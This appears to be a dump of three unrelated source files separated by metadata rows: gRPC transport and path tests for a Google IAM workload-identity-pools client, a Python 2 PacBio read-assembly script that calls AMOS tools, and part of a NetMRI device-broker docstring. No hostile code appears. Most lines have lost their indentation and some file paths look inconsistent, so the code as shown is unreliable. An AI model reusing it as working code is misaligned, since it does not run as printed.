("grpc.max_receive_message_length", -1),
],
)
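# The two channel options asserted above lift gRPC's default 4 MiB message
# size caps; -1 means "unlimited". A sketch of creating such a channel by
# hand (illustrative; the transport does this through create_channel):
def _example_unlimited_channel(host):
    return grpc.insecure_channel(
        host,
        options=[
            ("grpc.max_send_message_length", -1),
            ("grpc.max_receive_message_length", -1),
        ],
    )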
@pytest.mark.parametrize("transport_class", [transports.WorkloadIdentityPoolsGrpcTransport, transports.WorkloadIdentityPoolsGrpcAsyncIOTransport])
def test_workload_identity_pools_grpc_transport_client_cert_source_for_mtls(
transport_class
):
cred = ga_credentials.AnonymousCredentials()
# Check ssl_channel_credentials is used if provided.
with mock.patch.object(transport_class, "create_channel") as mock_create_channel:
mock_ssl_channel_creds = mock.Mock()
transport_class(
host="squid.clam.whelk",
credentials=cred,
ssl_channel_credentials=mock_ssl_channel_creds
)
mock_create_channel.assert_called_once_with(
"squid.clam.whelk:443",
credentials=cred,
credentials_file=None,
scopes=None,
ssl_credentials=mock_ssl_channel_creds,
quota_project_id=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
# Check if ssl_channel_credentials is not provided, then client_cert_source_for_mtls
# is used.
with mock.patch.object(transport_class, "create_channel", return_value=mock.Mock()):
with mock.patch("grpc.ssl_channel_credentials") as mock_ssl_cred:
transport_class(
credentials=cred,
client_cert_source_for_mtls=client_cert_source_callback
)
expected_cert, expected_key = client_cert_source_callback()
mock_ssl_cred.assert_called_once_with(
certificate_chain=expected_cert,
private_key=expected_key
)
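# The client_cert_source_callback used above (defined earlier in this module)
# follows the mTLS callback contract sketched here: a zero-argument callable
# returning (certificate_bytes, private_key_bytes) for
# grpc.ssl_channel_credentials to consume.
def _example_client_cert_source():
    return b"cert bytes", b"key bytes"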
def test_workload_identity_pools_host_no_port():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
client_options=client_options.ClientOptions(api_endpoint='iam.googleapis.com'),
)
assert client.transport._host == 'iam.googleapis.com:443'
def test_workload_identity_pools_host_with_port():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
client_options=client_options.ClientOptions(api_endpoint='iam.googleapis.com:8000'),
)
assert client.transport._host == 'iam.googleapis.com:8000'
def test_workload_identity_pools_grpc_transport_channel():
channel = grpc.secure_channel('http://localhost/', grpc.local_channel_credentials())
# Check that channel is used if provided.
transport = transports.WorkloadIdentityPoolsGrpcTransport(
host="squid.clam.whelk",
channel=channel,
)
assert transport.grpc_channel == channel
assert transport._host == "squid.clam.whelk:443"
    assert transport._ssl_channel_credentials is None
def test_workload_identity_pools_grpc_asyncio_transport_channel():
channel = aio.secure_channel('http://localhost/', grpc.local_channel_credentials())
# Check that channel is used if provided.
transport = transports.WorkloadIdentityPoolsGrpcAsyncIOTransport(
host="squid.clam.whelk",
channel=channel,
)
assert transport.grpc_channel == channel
assert transport._host == "squid.clam.whelk:443"
    assert transport._ssl_channel_credentials is None
# Remove this test when deprecated arguments (api_mtls_endpoint, client_cert_source) are
# removed from grpc/grpc_asyncio transport constructor.
@pytest.mark.parametrize("transport_class", [transports.WorkloadIdentityPoolsGrpcTransport, transports.WorkloadIdentityPoolsGrpcAsyncIOTransport])
def test_workload_identity_pools_transport_channel_mtls_with_client_cert_source(
transport_class
):
with mock.patch("grpc.ssl_channel_credentials", autospec=True) as grpc_ssl_channel_cred:
with mock.patch.object(transport_class, "create_channel") as grpc_create_channel:
mock_ssl_cred = mock.Mock()
grpc_ssl_channel_cred.return_value = mock_ssl_cred
mock_grpc_channel = mock.Mock()
grpc_create_channel.return_value = mock_grpc_channel
cred = ga_credentials.AnonymousCredentials()
with pytest.warns(DeprecationWarning):
with mock.patch.object(google.auth, 'default') as adc:
adc.return_value = (cred, None)
transport = transport_class(
host="squid.clam.whelk",
api_mtls_endpoint="mtls.squid.clam.whelk",
client_cert_source=client_cert_source_callback,
)
adc.assert_called_once()
grpc_ssl_channel_cred.assert_called_once_with(
certificate_chain=b"cert bytes", private_key=b"key bytes"
)
grpc_create_channel.assert_called_once_with(
"mtls.squid.clam.whelk:443",
credentials=cred,
credentials_file=None,
scopes=None,
ssl_credentials=mock_ssl_cred,
quota_project_id=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
assert transport.grpc_channel == mock_grpc_channel
assert transport._ssl_channel_credentials == mock_ssl_cred
# Remove this test when deprecated arguments (api_mtls_endpoint, client_cert_source) are
# removed from grpc/grpc_asyncio transport constructor.
@pytest.mark.parametrize("transport_class", [transports.WorkloadIdentityPoolsGrpcTransport, transports.WorkloadIdentityPoolsGrpcAsyncIOTransport])
def test_workload_identity_pools_transport_channel_mtls_with_adc(
transport_class
):
mock_ssl_cred = mock.Mock()
with mock.patch.multiple(
"google.auth.transport.grpc.SslCredentials",
__init__=mock.Mock(return_value=None),
ssl_credentials=mock.PropertyMock(return_value=mock_ssl_cred),
):
with mock.patch.object(transport_class, "create_channel") as grpc_create_channel:
mock_grpc_channel = mock.Mock()
grpc_create_channel.return_value = mock_grpc_channel
mock_cred = mock.Mock()
with pytest.warns(DeprecationWarning):
transport = transport_class(
host="squid.clam.whelk",
credentials=mock_cred,
api_mtls_endpoint="mtls.squid.clam.whelk",
client_cert_source=None,
)
grpc_create_channel.assert_called_once_with(
"mtls.squid.clam.whelk:443",
credentials=mock_cred,
credentials_file=None,
scopes=None,
ssl_credentials=mock_ssl_cred,
quota_project_id=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
assert transport.grpc_channel == mock_grpc_channel
def test_workload_identity_pools_grpc_lro_client():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
transport='grpc',
)
transport = client.transport
    # Ensure that we have an api-core operations client.
assert isinstance(
transport.operations_client,
operations_v1.OperationsClient,
)
# Ensure that subsequent calls to the property send the exact same object.
assert transport.operations_client is transport.operations_client
def test_workload_identity_pools_grpc_lro_async_client():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport='grpc_asyncio',
)
transport = client.transport
    # Ensure that we have an api-core operations client.
assert isinstance(
transport.operations_client,
operations_v1.OperationsAsyncClient,
)
# Ensure that subsequent calls to the property send the exact same object.
assert transport.operations_client is transport.operations_client
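# Both LRO tests rely on the transport caching its operations client; a
# minimal sketch of that memoization pattern (assumed, not the generated code):
class _ExampleCachingTransport:
    _operations_client = None
    @property
    def operations_client(self):
        # Create the client once, then hand back the exact same object.
        if self._operations_client is None:
            self._operations_client = object()
        return self._operations_client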
def test_workload_identity_pool_path():
project = "squid"
location = "clam"
workload_identity_pool = "whelk"
expected = "projects/{project}/locations/{location}/workloadIdentityPools/{workload_identity_pool}".format(project=project, location=location, workload_identity_pool=workload_identity_pool, )
actual = WorkloadIdentityPoolsClient.workload_identity_pool_path(project, location, workload_identity_pool)
assert expected == actual
def test_parse_workload_identity_pool_path():
expected = {
"project": "octopus",
"location": "oyster",
"workload_identity_pool": "nudibranch",
}
path = WorkloadIdentityPoolsClient.workload_identity_pool_path(**expected)
# Check that the path construction is reversible.
actual = WorkloadIdentityPoolsClient.parse_workload_identity_pool_path(path)
assert expected == actual
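# The *_path helpers are format/parse pairs over fixed resource-name
# templates. A hedged sketch of the parse direction (the client's real
# implementation may differ in details):
def _example_parse_pool_path(path):
    import re
    m = re.match(
        r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)"
        r"/workloadIdentityPools/(?P<workload_identity_pool>.+?)$",
        path,
    )
    return m.groupdict() if m else {}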
def test_workload_identity_pool_provider_path():
project = "cuttlefish"
location = "mussel"
workload_identity_pool = "winkle"
workload_identity_pool_provider = "nautilus"
expected = "projects/{project}/locations/{location}/workloadIdentityPools/{workload_identity_pool}/providers/{workload_identity_pool_provider}".format(project=project, location=location, workload_identity_pool=workload_identity_pool, workload_identity_pool_provider=workload_identity_pool_provider, )
actual = WorkloadIdentityPoolsClient.workload_identity_pool_provider_path(project, location, workload_identity_pool, workload_identity_pool_provider)
assert expected == actual
def test_parse_workload_identity_pool_provider_path():
expected = {
"project": "scallop",
"location": "abalone",
"workload_identity_pool": "squid",
"workload_identity_pool_provider": "clam",
}
path = WorkloadIdentityPoolsClient.workload_identity_pool_provider_path(**expected)
# Check that the path construction is reversible.
actual = WorkloadIdentityPoolsClient.parse_workload_identity_pool_provider_path(path)
assert expected == actual
def test_common_billing_account_path():
billing_account = "whelk"
expected = "billingAccounts/{billing_account}".format(billing_account=billing_account, )
actual = WorkloadIdentityPoolsClient.common_billing_account_path(billing_account)
assert expected == actual
def test_parse_common_billing_account_path():
expected = {
"billing_account": "octopus",
}
path = WorkloadIdentityPoolsClient.common_billing_account_path(**expected)
# Check that the path construction is reversible.
actual = WorkloadIdentityPoolsClient.parse_common_billing_account_path(path)
assert expected == actual
def test_common_folder_path():
folder = "oyster"
expected = "folders/{folder}".format(folder=folder, )
actual = WorkloadIdentityPoolsClient.common_folder_path(folder)
assert expected == actual
def test_parse_common_folder_path():
expected = {
"folder": "nudibranch",
}
path = WorkloadIdentityPoolsClient.common_folder_path(**expected)
# Check that the path construction is reversible.
actual = WorkloadIdentityPoolsClient.parse_common_folder_path(path)
assert expected == actual
def test_common_organization_path():
organization = "cuttlefish"
expected = "organizations/{organization}".format(organization=organization, )
actual = WorkloadIdentityPoolsClient.common_organization_path(organization)
assert expected == actual
def test_parse_common_organization_path():
expected = {
"organization": "mussel",
}
path = WorkloadIdentityPoolsClient.common_organization_path(**expected)
# Check that the path construction is reversible.
actual = WorkloadIdentityPoolsClient.parse_common_organization_path(path)
assert expected == actual
def test_common_project_path():
project = "winkle"
expected = "projects/{project}".format(project=project, )
actual = WorkloadIdentityPoolsClient.common_project_path(project)
assert expected == actual
def test_parse_common_project_path():
expected = {
"project": "nautilus",
}
path = WorkloadIdentityPoolsClient.common_project_path(**expected)
# Check that the path construction is reversible.
actual = WorkloadIdentityPoolsClient.parse_common_project_path(path)
assert expected == actual
def test_common_location_path():
project = "scallop"
location = "abalone"
expected = "projects/{project}/locations/{location}".format(project=project, location=location, )
actual = WorkloadIdentityPoolsClient.common_location_path(project, location)
assert expected == actual
def test_parse_common_location_path():
expected = {
"project": "squid",
"location": "clam",
}
path = WorkloadIdentityPoolsClient.common_location_path(**expected)
# Check that the path construction is reversible.
actual = WorkloadIdentityPoolsClient.parse_common_location_path(path)
assert expected == actual
def test_client_withDEFAULT_CLIENT_INFO():
client_info = gapic_v1.client_info.ClientInfo()
with mock.patch.object(transports.WorkloadIdentityPoolsTransport, '_prep_wrapped_messages') as prep:
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
client_info=client_info,
)
prep.assert_called_once_with(client_info)
with mock.patch.object(transports.WorkloadIdentityPoolsTransport, '_prep_wrapped_messages') as prep:
transport_class = WorkloadIdentityPoolsClient.get_transport_class()
transport = transport_class(
credentials=ga_credentials.AnonymousCredentials(),
client_info=client_info,
)
prep.assert_called_once_with(client_info)
@pytest.mark.asyncio
async def test_transport_close_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport="grpc_asyncio",
)
with mock.patch.object(type(getattr(client.transport, "grpc_channel")), "close") as close:
async with client:
close.assert_not_called()
close.assert_called_once()
def test_transport_close():
transports = {
"grpc": "_grpc_channel",
}
for transport, close_name in transports.items():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport
)
with mock.patch.object(type(getattr(client.transport, close_name)), "close") as close:
with client:
close.assert_not_called()
close.assert_called_once()
def test_client_ctx():
transports = [
'grpc',
]
for transport in transports:
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport
)
# Test client calls underlying transport.
with mock.patch.object(type(client.transport), "close") as close:
close.assert_not_called()
with client:
pass
close.assert_called()
| 41.496482 | 304 | 0.708694 | 19640 | 176941 | 6.09613 | 0.023625 | 0.107711 | 0.118602 | 0.045136 | 0.940173 | 0.922892 | 0.909645 | 0.887946 | 0.870306 | 0.853276 | 0 | 0.003787 | 0.217926 | 176941 | 4263 | 305 | 41.506216 | 0.861419 | 0.18513 | 0 | 0.712183 | 0 | 0 | 0.073343 | 0.03134 | 0 | 0 | 0 | 0.000235 | 0.121834 | 1 | 0.044148 | false | 0.000342 | 0.010267 | 0.000684 | 0.055099 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
83ccb50f440569adb2620ce96841ae7a9c25a27d | 7045 | py | Python | consensus_assembly.py | drmaize/C3S-LAA | 83aeee31f72144b348818ac142eb7878cdbaf211 | ["MIT"] | 4 | 2017-12-19T15:35:02.000Z | 2020-05-15T01:13:06.000Z | consensus_assembly.py | drmaize/C3S-LAA | 83aeee31f72144b348818ac142eb7878cdbaf211 | ["MIT"] | 1 | 2019-03-11T11:03:45.000Z | 2019-03-11T17:47:09.000Z | consensus_assembly.py | drmaize/C3S-LAA | 83aeee31f72144b348818ac142eb7878cdbaf211 | ["MIT"] | 3 | 2018-02-21T20:15:27.000Z | 2021-11-24T08:58:59.000Z |
### C3S-LAA
### Code for demultiplexing and assembly of error corrected PacBio read clusters.
### Version 0.2.2: 05/09/2017
### Author: Felix Francis (felixfrancier@gmail.com), Randall J Wisser (rjw@udel.edu)
############################################################
#Time to run the code: start timer
############################################################
import time
t0 = time.time()
############################################################
#### IMPORT FUNCTIONS
############################################################
from Bio import SeqIO
import pandas as pd
import os
import subprocess as sp
import shutil
from parameters import *
############################################################
#### FUNCTIONS
############################################################
### convert a given fasta file containing sequence reads to afg format and carry out minimus assembly.
def minimus_assembly(barcode_subset, amos_path, consensus_output):
### convert fasta to afg format
    ### Non-barcoded reads live directly under the consensus output directory;
    ### the barcoded case is handled by minimus_assembly_barcoded() below.
    reads = consensus_output + "merged_reads"
p = sp.Popen(["%stoAmos" %amos_path,"-s","%s" %reads+".fasta", "-o", "%s" %reads+"_assembly_temp.afg"], stdout=sp.PIPE)
out, err = p.communicate()
### assemble afg reads
p = sp.Popen(["%sminimus" %amos_path, "%s" %reads+"_assembly_temp.afg"], stdout=sp.PIPE)
out, err = p.communicate()
shutil.rmtree(reads+ "_assembly_temp.bnk")
os.remove(reads+ "_assembly_temp.afg.runAmos.log")
os.remove(reads+ "_assembly_temp.afg")
os.remove(reads+ "_assembly_temp.contig")
renamed_assembly = open(consensus_output +"c3slaa_assembly" +".fasta", "w")
fasta_assembly = SeqIO.parse(open(consensus_output + "merged_reads_assembly_temp.fasta"), 'fasta')
for fasta in fasta_assembly:
header, sequence = fasta.id.split('_'), str(fasta.seq)
renamed_assembly.write(">C3SLAA_" +str(header[0]) + "\n")
renamed_assembly.write(sequence + "\n")
renamed_assembly.close()
os.remove(consensus_output +"merged_reads_assembly_temp.fasta")
### convert a given fasta file containing sequence reads to afg format and carry out minimus assembly (barcoded)
def minimus_assembly_barcoded(barcode_name, barcode_subset, amos_path, consensus_output):
### convert fasta to afg format
    ### Barcoded reads live in a per-barcode subdirectory of the consensus output.
    reads = consensus_output + barcode_name + "/" + barcode_name + "merged_reads"
p = sp.Popen(["%stoAmos" %amos_path,"-s","%s" %reads+".fasta", "-o", "%s" %reads+"_assembly_temp.afg"], stdout=sp.PIPE)
out, err = p.communicate()
### assemble afg reads
p = sp.Popen(["%sminimus" %amos_path, "%s" %reads+"_assembly_temp.afg"], stdout=sp.PIPE)
out, err = p.communicate()
shutil.rmtree(reads+ "_assembly_temp.bnk")
os.remove(reads+ "_assembly_temp.afg.runAmos.log")
os.remove(reads+ "_assembly_temp.afg")
os.remove(reads+ "_assembly_temp.contig")
renamed_assembly = open(consensus_output + barcode_name+"c3slaa_assembly" +".fasta", "w")
fasta_assembly = SeqIO.parse(open(consensus_output + barcode_name+ "merged_reads_assembly_temp.fasta"), 'fasta')
for fasta in fasta_assembly:
header, sequence = fasta.id.split('_'), str(fasta.seq)
renamed_assembly.write(">C3SLAA_" +str(header[0]) + "\n")
renamed_assembly.write(sequence + "\n")
renamed_assembly.close()
os.remove(consensus_output + barcode_name +"merged_reads_assembly_temp.fasta")
### pick reads from each barcoded sample and assemble (barcoded)
def pooled_locus_read_assembly_barcoded(primer_info_file, barcode_subset, amos_path,consensus_output):
df_barcodes = pd.read_csv(barcode_list, sep='\t', skiprows=0, header=0)
for index, row in df_barcodes.iterrows():
barcode_name = str(row['f_barcode_name']) + "_" + str(row['r_barcode_name'])
merged_fasta = open(str(consensus_output) + barcode_name + "/"+ barcode_name + "merged_reads" +".fasta", "w")
df_primers = pd.read_csv(primer_info_file, sep='\t', skiprows=0, header=0) ### read primer info
for index, row in df_primers.iterrows():
f_primer_name, r_primer_name = str(row['f_primer_name']), str(row['r_primer_name'])
primer_chr_no, amplicon_start, amplicon_stop = int(f_primer_name.split("_")[1]), int(f_primer_name.split("_")[2]), int(r_primer_name.split("_")[2])
seq_path = str(consensus_output) + barcode_name + "/amplicon_"+ str(primer_chr_no) + "_" + str(amplicon_start) + "_" + str(amplicon_stop) + "/"
fasta_sequences = SeqIO.parse(open(seq_path + "amplicon_analysis.fasta"), 'fasta')
for fasta in fasta_sequences:
header, sequence = fasta.id.split('_'), str(fasta.seq)
no_reads = int(header[3][8:])
if no_reads >= no_reads_threshold:
merged_fasta.write(">" +str(barcode_name) + "_" +str(primer_chr_no) + "_" +str(amplicon_start)+ "_" +str(amplicon_stop) + "\n")
merged_fasta.write(sequence[trim_bp:-trim_bp] + "\n")
merged_fasta.close()
minimus_assembly_barcoded(barcode_name, barcode_subset, amos_path, consensus_output)
### pick reads from each sample and assemble (no barcodes)
def pooled_locus_read_assembly(primer_info_file, barcode_subset, amos_path,consensus_output):
merged_fasta = open(str(consensus_output) + "merged_reads" +".fasta", "w")
df_primers = pd.read_csv(primer_info_file, sep='\t', skiprows=0, header=0) ### read primer info
for index, row in df_primers.iterrows():
f_primer_name, r_primer_name = str(row['f_primer_name']), str(row['r_primer_name'])
primer_chr_no, amplicon_start, amplicon_stop = int(f_primer_name.split("_")[1]), int(f_primer_name.split("_")[2]), int(r_primer_name.split("_")[2])
seq_path = str(consensus_output) + "/amplicon_"+ str(primer_chr_no) + "_" + str(amplicon_start) + "_" + str(amplicon_stop) + "/"
fasta_sequences = SeqIO.parse(open(seq_path + "amplicon_analysis.fasta"), 'fasta')
for fasta in fasta_sequences:
header, sequence = fasta.id.split('_'), str(fasta.seq)
no_reads = int(header[3][8:])
if no_reads >= no_reads_threshold:
merged_fasta.write(">" +str(primer_chr_no) + "_" +str(amplicon_start)+ "_" +str(amplicon_stop) + "\n")
merged_fasta.write(sequence[trim_bp:-trim_bp] + "\n")
merged_fasta.close()
minimus_assembly(barcode_subset, amos_path, consensus_output)
############################################################
#### CODE
############################################################
if __name__ == '__main__':
if barcode_subset == 1:
pooled_locus_read_assembly_barcoded(primer_info_file, barcode_subset, amos_path,consensus_output)
elif barcode_subset ==0:
pooled_locus_read_assembly(primer_info_file, barcode_subset, amos_path,consensus_output)
#############################################
#Time to run the code: end timer
############################################################
t1 = time.time()
total = t1-t0
total = ("{0:.2f}".format(round(total,2)))
print "total time to run = ", total, " seconds"
| 48.923611 | 150 | 0.667991 | 929 | 7,045 | 4.768568 | 0.166846 | 0.074492 | 0.0614 | 0.037923 | 0.832506 | 0.815576 | 0.799549 | 0.793228 | 0.773363 | 0.762077 | 0 | 0.007193 | 0.111994 | 7,045 | 143 | 151 | 49.265734 | 0.700927 | 0.105181 | 0 | 0.59 | 0 | 0 | 0.14909 | 0.048755 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.13 | null | null | 0.01 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
83ebeabed6d5fbae7e8854fee5f3a5b6c11a3a5e | 212,113 | py | Python | infoblox_netmri/api/broker/v3_6_0/infra_device_broker.py | IngmarVG-IB/infoblox-netmri | b0c725fd64aee1890d83917d911b89236207e564 | [
"Apache-2.0"
] | null | null | null | infoblox_netmri/api/broker/v3_6_0/infra_device_broker.py | IngmarVG-IB/infoblox-netmri | b0c725fd64aee1890d83917d911b89236207e564 | [
"Apache-2.0"
] | null | null | null | infoblox_netmri/api/broker/v3_6_0/infra_device_broker.py | IngmarVG-IB/infoblox-netmri | b0c725fd64aee1890d83917d911b89236207e564 | [
"Apache-2.0"
] | null | null | null | from ..broker import Broker
class InfraDeviceBroker(Broker):
controller = "infra_devices"
def index(self, **kwargs):
"""Lists the available infra devices. Any of the inputs listed may be be used to narrow the list; other inputs will be ignored. Of the various ways to query lists, using this method is most efficient.
**Inputs**
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceFirstOccurrenceTime: The date/time that this device was first seen on the network.
:type DeviceFirstOccurrenceTime: DateTime
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceFirstOccurrenceTime: The date/time that this device was first seen on the network.
:type DeviceFirstOccurrenceTime: Array of DateTime
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Array of Integer
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceIPDotted: The management IP address of the device, in dotted (or colon-delimited for IPv6) format.
:type DeviceIPDotted: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceIPDotted: The management IP address of the device, in dotted (or colon-delimited for IPv6) format.
:type DeviceIPDotted: Array of String
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceIPNumeric: The numerical value of the device IP address.
:type DeviceIPNumeric: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceIPNumeric: The numerical value of the device IP address.
:type DeviceIPNumeric: Array of Integer
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceName: The NetMRI name of the device; this will be either the same as DeviceSysName or DeviceDNSName, depending on your NetMRI configuration.
:type DeviceName: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceName: The NetMRI name of the device; this will be either the same as DeviceSysName or DeviceDNSName, depending on your NetMRI configuration.
:type DeviceName: Array of String
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceRebootTime: The date/time this device was last rebooted.
:type DeviceRebootTime: DateTime
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceRebootTime: The date/time this device was last rebooted.
:type DeviceRebootTime: Array of DateTime
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceType: The NetMRI-determined device type.
:type DeviceType: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceType: The NetMRI-determined device type.
:type DeviceType: Array of String
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param ParentDeviceID: The internal NetMRI identifier for the device containing this virtual device.
:type ParentDeviceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param ParentDeviceID: The internal NetMRI identifier for the device containing this virtual device.
:type ParentDeviceID: Array of Integer
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param VirtualNetworkID: The internal NetMRI identifier of the Virtual Network to which the management address of this device belongs.
:type VirtualNetworkID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param VirtualNetworkID: The internal NetMRI identifier of the Virtual Network to which the management address of this device belongs.
:type VirtualNetworkID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceGroupID: The internal NetMRI identifier of the device groups to which to limit the results.
:type DeviceGroupID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param timestamp: The data returned will represent the infra devices as of this date and time. If omitted, the result will indicate the most recently collected data.
:type timestamp: DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of infra device methods. The listed methods will be called on each infra device returned and included in the output. Available methods are: DeviceCommunitySecure, DeviceRank, DeviceCommunity, DeviceFirstOccurrence, group, parent_device, gateway_device, running_config, running_config_text, saved_config, saved_config_text, running_config_diff, saved_config_diff, virtual_child_count, asset_type, device_setting, data_collection_status, control_capabilities, network_name, interfaces, issue_details, device_routes, device_physicals, if_addrs, config_revisions, detected_changes, device_ports, privileged_polling, DeviceStartTime, DeviceEndTime, cap_description_ind, cap_admin_status_ind, cap_vlan_assignment_ind, cap_voice_vlan_ind, cap_net_provisioning_ind, cap_net_vlan_provisioning_ind, cap_net_deprovisioning_ind, cap_description_na_reason, cap_admin_status_na_reason, cap_vlan_assignment_na_reason, cap_voice_vlan_na_reason, cap_net_provisioning_na_reason, cap_net_vlan_provisioning_na_reason, cap_net_deprovisioning_na_reason, chassis_serial_number, available_mgmt_ips, rawSysDescr, rawSysVersion, rawSysModel, data_source, device.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: parent_device, device_setting, data_collection_status, interfaces, issue_details, device_routes, device_physicals, if_addrs, config_revisions, detected_changes, device_ports, data_source, device.
:type include: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit parameter for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` DeviceID
:param sort: The data field(s) to use for sorting the output. Default is DeviceID. Valid values are DataSourceID, DeviceID, InfraDeviceStartTime, InfraDeviceEndTime, InfraDeviceChangedCols, DeviceIPDotted, DeviceIPNumeric, DeviceName, DeviceType, DeviceAssurance, DeviceVendor, DeviceModel, DeviceVersion, DeviceSysName, DeviceSysDescr, DeviceSysLocation, DeviceSysContact, DeviceDNSName, DeviceConfigTimestamp, DeviceFirstOccurrenceTime, InfraDeviceTimestamp, DeviceSAAVersion, DeviceRebootTime, DeviceRunningConfigLastChangedTime, DeviceSavedConfigLastChangedTime, DeviceConfigLastCheckedTime, DevicePolicyScheduleMode, DeviceAddlInfo, DeviceMAC, ParentDeviceID, DeviceContextName, DeviceNetBIOSName, DeviceOUI, MgmtServerDeviceID, NetworkDeviceInd, RoutingInd, SwitchingInd, VirtualInd, FilteringInd, FilterProvisionData, VirtualNetworkID, VirtualNetworkingInd, DeviceUniqueKey.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each InfraDevice. Valid values are DataSourceID, DeviceID, InfraDeviceStartTime, InfraDeviceEndTime, InfraDeviceChangedCols, DeviceIPDotted, DeviceIPNumeric, DeviceName, DeviceType, DeviceAssurance, DeviceVendor, DeviceModel, DeviceVersion, DeviceSysName, DeviceSysDescr, DeviceSysLocation, DeviceSysContact, DeviceDNSName, DeviceConfigTimestamp, DeviceFirstOccurrenceTime, InfraDeviceTimestamp, DeviceSAAVersion, DeviceRebootTime, DeviceRunningConfigLastChangedTime, DeviceSavedConfigLastChangedTime, DeviceConfigLastCheckedTime, DevicePolicyScheduleMode, DeviceAddlInfo, DeviceMAC, ParentDeviceID, DeviceContextName, DeviceNetBIOSName, DeviceOUI, MgmtServerDeviceID, NetworkDeviceInd, RoutingInd, SwitchingInd, VirtualInd, FilteringInd, FilterProvisionData, VirtualNetworkID, VirtualNetworkingInd, DeviceUniqueKey. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param NetworkID: The network id to which results would be limited.
:type NetworkID: Integer
| ``api version min:`` 2.10
| ``api version max:`` None
| ``required:`` False
| ``default:`` False
:param detail_ind: A flag to indicate whether discovery times should be included or not.
